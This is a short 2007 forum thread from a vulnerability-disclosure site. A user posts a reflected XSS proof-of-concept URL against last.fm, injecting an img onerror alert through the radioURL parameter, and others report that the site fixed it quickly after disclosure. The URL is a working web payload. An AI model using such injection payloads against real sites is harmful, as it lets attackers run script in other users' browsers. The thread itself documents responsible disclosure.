Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Last FM XSS
Posted by: jungsonn
Date: February 02, 2007 10:15AM

Thought that it would be funny:

http://www.last.fm/webclient/popup/?radioURL=%22%22%3E%3Cimg%20src=%22sfsdfs%22%20onerror=%22javascript:alert('xss')%22%20%3C%22%3E

I already contacted LAST FM, if they are quick, it would be fixed soon.

Options: ReplyQuote
Re: Last FM XSS
Posted by: Anonymous User
Date: February 02, 2007 02:08PM

fixed

Options: ReplyQuote
Re: Last FM XSS
Posted by: Kyran
Date: February 02, 2007 03:10PM

I've disclosed a few to them. They are usually REALLY quick. =)

- Kyran

Options: ReplyQuote
Re: Last FM XSS
Posted by: jungsonn
Date: February 03, 2007 03:43AM

That's quick, and on a Friday also :)

@Kyran

Wow... seems they only patch the ones that get submitted them?
We should be asking money for these things damn... another freebee. :)

Options: ReplyQuote


Sorry, only registered users may post in this forum.